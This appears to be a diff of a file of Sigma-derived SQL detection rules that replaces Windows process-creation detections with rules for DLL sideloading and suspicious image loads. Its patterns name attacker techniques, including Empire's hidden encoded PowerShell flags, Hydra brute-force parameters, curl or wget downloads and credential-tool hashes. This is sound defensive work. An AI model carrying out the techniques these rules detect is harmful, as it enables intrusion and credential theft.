"attack.execution", - "attack.t1059" + "attack.t1204.002" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment" + "Legitimate macro usage. Add the appropriate filter according to your environment" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%rasdial.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenote.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\assembly\\\\GAC\\_MSIL%' ESCAPE '\\')" ], - "filename": "proc_creation_win_rasdial_execution.yml" + "filename": "image_load_office_dotnet_gac_dll_load.yml" }, { - "title": "Add User to Local Administrators Group", - "id": "ad720b90-25ad-43ff-9b5e-5c841facc8e5", - "status": "experimental", - "description": "Detects suspicious command line that adds an account to the local administrators/administrateurs group", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "WMIC Loading Scripting Libraries", + "id": "06ce37c2-61ab-4f05-9ff5-b1a96d18ae32", + "status": "test", + "description": "Detects threat actors proxy executing code and bypassing application controls by leveraging wmic and the `/FORMAT` argument switch to download and execute an XSL file (i.e js, vbs, etc).", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.persistence", - "attack.t1098" + "attack.defense_evasion", + "attack.t1220" ], "falsepositives": [ - "Administrative activity" + "The command wmic os get lastboottuptime loads vbscript.dll", + "The command wmic os get locale loads vbscript.dll", + "Since the ImageLoad event doesn't have enough information in this case. It's better to look at the recent process creation events that spawned the WMIC process and investigate the command line and parent/child processes to get more insights" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%localgroup %' ESCAPE '\\' AND CommandLine LIKE '% /add%' ESCAPE '\\') OR (CommandLine LIKE '%Add-LocalGroupMember %' ESCAPE '\\' AND CommandLine LIKE '% -Group %' ESCAPE '\\')) AND (CommandLine LIKE '% administrators %' ESCAPE '\\' OR CommandLine LIKE '% administrateur%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\jscript.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vbscript.dll' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_add_user_local_admin_group.yml" + "filename": "image_load_wmic_remote_xsl_scripting_dlls.yml" }, { - "title": "Suspicious Msiexec Quiet Install", - "id": "79a87aa6-e4bd-42fc-a5bb-5e6fbdcd62f5", + "title": "Potential DLL Sideloading Via JsSchHlp", + "id": "68654bf0-4412-43d5-bfe8-5eaa393cd939", "status": "experimental", - "description": "Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.\nMsiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)\n", + "description": "Detects potential DLL sideloading using JUSTSYSTEMS Japanese word processor", "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1218.007" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Legitimate script" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR OriginalFileName = 'msiexec.exe') AND (CommandLine LIKE '%/i%' ESCAPE '\\' OR CommandLine LIKE '%-i%' ESCAPE '\\' OR CommandLine LIKE '%/package%' ESCAPE '\\' OR CommandLine LIKE '%-package%' ESCAPE '\\' OR CommandLine LIKE '%/a%' ESCAPE '\\' OR CommandLine LIKE '%-a%' ESCAPE '\\' OR CommandLine LIKE '%/j%' ESCAPE '\\' OR CommandLine LIKE '%-j%' ESCAPE '\\') AND (CommandLine LIKE '%/q%' ESCAPE '\\' OR CommandLine LIKE '%-q%' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Windows\\\\CCM\\\\Ccm32BitLauncher.exe' ESCAPE '\\' AND IntegrityLevel = 'System')))" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\JSESPR.dll' ESCAPE '\\' AND NOT (ImageLoaded LIKE 'C:\\\\Program Files\\\\Common Files\\\\Justsystem\\\\JsSchHlp\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_msiexec_install_quiet.yml" + "filename": "image_load_side_load_jsschhlp.yml" }, { - "title": "Potentially Over Permissive Permissions Granted Using Dsacls.EXE", - "id": "01c42d3c-242d-4655-85b2-34f1739632f7", - "status": "experimental", - "description": "Detects usage of Dsacls to grant over permissive permissions", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Svchost DLL Search Order Hijack", + "id": "602a1f13-c640-4d73-b053-be9a2fa58b77", + "status": "test", + "description": "Detects DLL sideloading of DLLs that are loaded by the SCM for some services (IKE, IKEEXT, SessionEnv) which do not exists on a typical modern system\nIKEEXT and SessionEnv service, as they call LoadLibrary on files that do not exist within C:\\Windows\\System32\\ by default.\nAn attacker can place their malicious logic within the PROCESS_ATTACH block of their library and restart the aforementioned services \"svchost.exe -k netsvcs\" to gain code execution on a remote machine.\n", + "author": "SBousseaden", "tags": [ - "attack.execution", - "attack.t1218" + "attack.persistence", + "attack.defense_evasion", + "attack.t1574.002", + "attack.t1574.001" ], "falsepositives": [ - "Legitimate administrators granting over permissive permissions to users" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\dsacls.exe' ESCAPE '\\' OR OriginalFileName = 'DSACLS.EXE') AND CommandLine LIKE '% /G %' ESCAPE '\\' AND (CommandLine LIKE '%GR%' ESCAPE '\\' OR CommandLine LIKE '%GE%' ESCAPE '\\' OR CommandLine LIKE '%GW%' ESCAPE '\\' OR CommandLine LIKE '%GA%' ESCAPE '\\' OR CommandLine LIKE '%WP%' ESCAPE '\\' OR CommandLine LIKE '%WD%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\tsmsisrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tsvipsrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlbsctrl.dll' ESCAPE '\\')) AND NOT (ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_dsacls_abuse_permissions.yml" + "filename": "image_load_side_load_svchost_dlls.yml" }, { - "title": "Permission Check Via Accesschk.EXE", - "id": "c625d754-6a3d-4f65-9c9a-536aea960d37", - "status": "test", - "description": "Detects the usage of the \"Accesschk\" utility, an access and privilege audit tool developed by SysInternal and often being abused by attacker to verify process privileges", - "author": "Teymur Kheirkhabarov (idea), Mangatas Tondang, oscd.community, Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Volume Shadow Copy Vsstrace.dll Load", + "id": "48bfd177-7cf2-412b-ad77-baf923489e82", + "status": "experimental", + "description": "Detects the image load of VSS DLL by uncommon executables", + "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1069.001" + "attack.defense_evasion", + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "System administrator Usage" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Product LIKE '%AccessChk' ESCAPE '\\' OR Description LIKE '%Reports effective permissions%' ESCAPE '\\' OR (NewProcessName LIKE '%\\\\accesschk.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\accesschk64.exe' ESCAPE '\\') OR OriginalFileName = 'accesschk.exe') AND (CommandLine LIKE '%uwcqv %' ESCAPE '\\' OR CommandLine LIKE '%kwsu %' ESCAPE '\\' OR CommandLine LIKE '%qwsu %' ESCAPE '\\' OR CommandLine LIKE '%uwdqs %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\vsstrace.dll' ESCAPE '\\' AND NOT (((NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\{%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_sysinternals_accesschk_check_permissions.yml" + "filename": "image_load_dll_vsstrace_susp_load.yml" }, { - "title": "Suspicious Reconnaissance Activity Using Get-LocalGroupMember Cmdlet", - "id": "c8a180d6-47a3-4345-a609-53f9c3d834fc", + "title": "HackTool - SharpEvtMute DLL Load", + "id": "49329257-089d-46e6-af37-4afce4290685", "status": "experimental", - "description": "Detects suspicious reconnaissance command line activity on Windows systems using the PowerShell Get-LocalGroupMember Cmdlet", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the load of EvtMuteHook.dll, a key component of SharpEvtHook, a tool that tampers with the Windows event logs", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1087.001" + "attack.defense_evasion", + "attack.t1562.002" ], "falsepositives": [ - "Administrative activity" + "Other DLLs with the same Imphash" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%Get-LocalGroupMember %' ESCAPE '\\' AND (CommandLine LIKE '%domain admins%' ESCAPE '\\' OR CommandLine LIKE '% administrator%' ESCAPE '\\' OR CommandLine LIKE '% administrateur%' ESCAPE '\\' OR CommandLine LIKE '%enterprise admins%' ESCAPE '\\' OR CommandLine LIKE '%Exchange Trusted Subsystem%' ESCAPE '\\' OR CommandLine LIKE '%Remote Desktop Users%' ESCAPE '\\' OR CommandLine LIKE '%Utilisateurs du Bureau à distance%' ESCAPE '\\' OR CommandLine LIKE '%Usuarios de escritorio remoto%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Hashes LIKE '%IMPHASH=330768A4F172E10ACB6287B87289D83B%' ESCAPE '\\' OR Imphash = '330768a4f172e10acb6287b87289d83b')" ], - "filename": "proc_creation_win_powershell_get_localgroup_member_recon.yml" + "filename": "image_load_hktl_sharpevtmute.yml" }, { - "title": "Blue Mockingbird", - "id": "c3198a27-23a0-4c2c-af19-e5328d49680e", - "status": "test", - "description": "Attempts to detect system changes made by Blue Mockingbird", - "author": "Trent Liffick (@tliffick)", + "title": "UIPromptForCredentials DLLs", + "id": "9ae01559-cf7e-4f8e-8e14-4c290a1b4784", + "status": "experimental", + "description": "Detects potential use of UIPromptForCredentials functions by looking for some of the DLLs needed for it.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.execution", - "attack.t1112", - "attack.t1047" + "attack.credential_access", + "attack.collection", + "attack.t1056.002" ], "falsepositives": [ - "Unknown" + "Other legitimate processes loading those DLLs in your environment." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%sc config%' ESCAPE '\\' AND CommandLine LIKE '%wercplsupporte.dll%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' AND CommandLine LIKE '%COR\\_PROFILER' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (((ImageLoaded LIKE '%\\\\credui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wincredui.dll' ESCAPE '\\') OR OriginalFileName IN ('credui.dll', 'wincredui.dll')) AND NOT (((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\opera\\_autoupdate.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procexp.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\AppData\\\\Roaming\\\\Spotify\\\\Spotify.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\stage\\\\Teams.exe' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\regedit.exe' ESCAPE '\\') OR (Provider_Name = 'Microsoft-Windows-Kernel-Process' AND CommandLine LIKE '%C:\\\\Program Files\\\\WindowsApps\\\\SpotifyAB.SpotifyMusic\\_%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_malware_blue_mockingbird.yml" + "filename": "image_load_uipromptforcreds_dlls.yml" }, { - "title": "HackTool - Empire PowerShell Launch Parameters", - "id": "79f4ede3-402e-41c8-bc3e-ebbf5f162581", - "status": "test", - "description": "Detects suspicious powershell command line parameters used in Empire", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Rcdll.DLL Sideloading", + "id": "6e78b74f-c762-4800-82ad-f66787f10c8a", + "status": "experimental", + "description": "Detects potential DLL sideloading of rcdll.dll", + "author": "X__Junior (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Other tools that incidentally use the same command line parameters" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '% -NoP -sta -NonI -W Hidden -Enc %' ESCAPE '\\' OR CommandLine LIKE '% -noP -sta -w 1 -enc %' ESCAPE '\\' OR CommandLine LIKE '% -NoP -NonI -W Hidden -enc %' ESCAPE '\\' OR CommandLine LIKE '% -noP -sta -w 1 -enc%' ESCAPE '\\' OR CommandLine LIKE '% -enc SQB%' ESCAPE '\\' OR CommandLine LIKE '% -nop -exec bypass -EncodedCommand %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\rcdll.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Windows Kits\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_empire_powershell_launch.yml" + "filename": "image_load_side_load_rcdll.yml" }, { - "title": "Perl Inline Command Execution", - "id": "f426547a-e0f7-441a-b63e-854ac5bdf54d", + "title": "Web Browsers DLL Sideloading", + "id": "72ca7c75-bf85-45cd-aca7-255d360e423c", "status": "experimental", - "description": "Detects execution of perl using the \"-e\"/\"-E\" flags. This is could be used as a way to launch a reverse shell or execute live perl code.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects DLL sideloading of DLLs that are part of web browsers", + "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\perl.exe' ESCAPE '\\' OR OriginalFileName = 'perl.exe') AND CommandLine LIKE '% -e%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\chrome\\_frame\\_helper.dll' ESCAPE '\\' AND NOT (ImageLoaded LIKE '%\\\\AppData\\\\local\\\\Google\\\\Chrome\\\\Application\\\\%' ESCAPE '\\' OR (ImageLoaded LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_perl_inline_command_execution.yml" + "filename": "image_load_side_load_web_browsers.yml" }, { - "title": "HackTool - Hydra Password Bruteforce Execution", - "id": "aaafa146-074c-11eb-adc1-0242ac120002", - "status": "test", - "description": "Detects command line parameters used by Hydra password guessing hack tool", - "author": "Vasiliy Burov", + "title": "DLL Sideloading Of DBGHELP.DLL", + "id": "6414b5cd-b19d-447e-bb5e-9f03940b5784", + "status": "experimental", + "description": "Detects DLL sideloading of \"dbghelp.dll\"", + "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", "tags": [ - "attack.credential_access", - "attack.t1110", - "attack.t1110.001" + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Software that uses the caret encased keywords PASS and USER in its command line" + "Legitimate applications loading their own versions of the DLL mentioned in this rule" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%-u %' ESCAPE '\\' AND CommandLine LIKE '%-p %' ESCAPE '\\' AND (CommandLine LIKE '%^USER^%' ESCAPE '\\' OR CommandLine LIKE '%^PASS^%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' AND NOT (((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SystemTemp\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\') OR (ImageLoaded LIKE '%\\\\Epic Games\\\\Launcher\\\\Engine\\\\Binaries\\\\ThirdParty\\\\DbgHelp\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Epic Games\\\\MagicLegends\\\\x86\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Anaconda3\\\\Lib\\\\site-packages\\\\vtrace\\\\platforms\\\\windll\\\\amd64\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Anaconda3\\\\Lib\\\\site-packages\\\\vtrace\\\\platforms\\\\windll\\\\i386\\\\dbghelp.dll' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_hktl_hydra.yml" + "filename": "image_load_side_load_dbghelp_dll.yml" }, { - "title": "Suspicious Download from Office Domain", - "id": "00d49ed5-4491-4271-a8db-650a4ef6f8c1", - "status": "experimental", - "description": "Detects suspicious ways to download files from Microsoft domains that are used to store attachments in Emails or OneNote documents", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "Active Directory Kerberos DLL Loaded Via Office Application", + "id": "7417e29e-c2e7-4cf6-a2e8-767228c64837", + "status": "test", + "description": "Detects Kerberos DLL being loaded by an Office Product", + "author": "Antonlovesdnb", + "tags": [ + "attack.execution", + "attack.t1204.002" + ], "falsepositives": [ - "Scripts or tools that download attachments from these domains (OneNote, Outlook 365)" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wget.exe' ESCAPE '\\') OR (CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%curl %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\' OR CommandLine LIKE '%Start-BitsTransfer%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadFile(%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadString(%' ESCAPE '\\')) AND (CommandLine LIKE '%https://attachment.outlook.live.net/owa/%' ESCAPE '\\' OR CommandLine LIKE '%https://onenoteonlinesync.onenote.com/onenoteonlinesync/%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenote.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\kerberos.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_download_office_domain.yml" + "filename": "image_load_office_kerberos_dll_load.yml" }, { - "title": "Suspicious Rundll32 Without Any CommandLine Params", - "id": "1775e15e-b61b-4d14-a1a3-80981298085a", + "title": "DLL Sideloading Of ShellChromeAPI.DLL", + "id": "ee4c5d06-3abc-48cc-8885-77f1c20f4451", "status": "experimental", - "description": "Detects suspicious start of rundll32.exe without any parameters as found in CobaltStrike beacon activity", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects processes loading the non-existent DLL \"ShellChromeAPI\". One known example is the \"DeviceEnroller\" binary in combination with the \"PhoneDeepLink\" flag tries to load this DLL.\nAdversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1202" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Possible but rare" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND CommandLine LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND NOT ((ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Microsoft\\\\Edge\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ImageLoaded LIKE '%\\\\ShellChromeAPI.dll' ESCAPE '\\'" ], - "filename": "proc_creation_win_rundll32_no_params.yml" + "filename": "image_load_side_load_shell_chrome_api.yml" }, { - "title": "HackTool - Windows Credential Editor (WCE) Execution", - "id": "7aa7009a-28b9-4344-8c1f-159489a390df", - "status": "test", - "description": "Detects the use of Windows Credential Editor (WCE)", - "author": "Florian Roth (Nextron Systems)", + "title": "PowerShell Core DLL Loaded By Non PowerShell Process", + "id": "092bc4b9-3d1d-43b4-a6b4-8c8acd83522f", + "status": "experimental", + "description": "Detects loading of essential DLLs used by PowerShell, but not by the process powershell.exe. Detects behaviour similar to meterpreter's \"load powershell\" extension.", + "author": "Tom Kern, oscd.community, Natalia Shornikova, Tim Shelton", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0005" + "attack.t1059.001", + "attack.execution" ], "falsepositives": [ - "Another service that uses a single -s command line switch" + "Used by some .NET binaries, minimal on user workstation.", + "Used by Microsoft SQL Server Management Studio" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((Imphash IN ('a53a02b997935fd8eedcb5f7abab9b9f', 'e96a73c7bf33a464c510ede582318bf2') OR (Hashes LIKE '%IMPHASH=a53a02b997935fd8eedcb5f7abab9b9f%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=e96a73c7bf33a464c510ede582318bf2%' ESCAPE '\\')) OR (CommandLine LIKE '%.exe -S' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\')) AND NOT (NewProcessName LIKE '%\\\\clussvc.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\System.Management.Automation.Dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\System.Management.Automation.ni.Dll' ESCAPE '\\') AND NOT (((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\dsac.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\PowerShell\\\\7\\\\pwsh.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WINDOWS\\\\System32\\\\sdiagnhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mscorsvw.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WINDOWS\\\\System32\\\\RemoteFXvGPUDisablement.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sqlps.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winrshost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\syncappvpublishingserver.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\runscripthelper.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ServerManager.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft SQL Server Management Studio %\\\\Common%\\\\IDE\\\\Ssms.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\IDE\\\\devenv.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ServiceHub.VSDetouredHost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ServiceHub.SettingsHost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ServiceHub.Host.CLR.x86.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Citrix\\\\ConfigSync\\\\ConfigSyncRun.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\thor64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\thor.exe' ESCAPE '\\')) OR (NewProcessName = '')))" ], - "filename": "proc_creation_win_hktl_wce.yml" + "filename": "image_load_dll_system_management_automation_susp_load.yml" }, { - "title": "Gpscript Execution", - "id": "1e59c230-6670-45bf-83b0-98903780607e", + "title": "Potential Wazuh Security Platform DLL Sideloading", + "id": "db77ce78-7e28-4188-9337-cf30e2b3ba9f", "status": "experimental", - "description": "Detects the execution of the LOLBIN gpscript, which executes logon or startup scripts configured in Group Policy", - "author": "frack113", + "description": "Detects potential DLL side loading of DLLs that are part of the Wazuh security platform", + "author": "X__Junior (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Legitimate uses of logon scripts distributed via group policy" + "Many legitimate applications leverage this DLL. (Visual Studio, JetBrains, Ruby, Anaconda, GithubDesktop, etc.)" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\gpscript.exe' ESCAPE '\\' OR OriginalFileName = 'GPSCRIPT.EXE') AND (CommandLine LIKE '% /logon%' ESCAPE '\\' OR CommandLine LIKE '% /startup%' 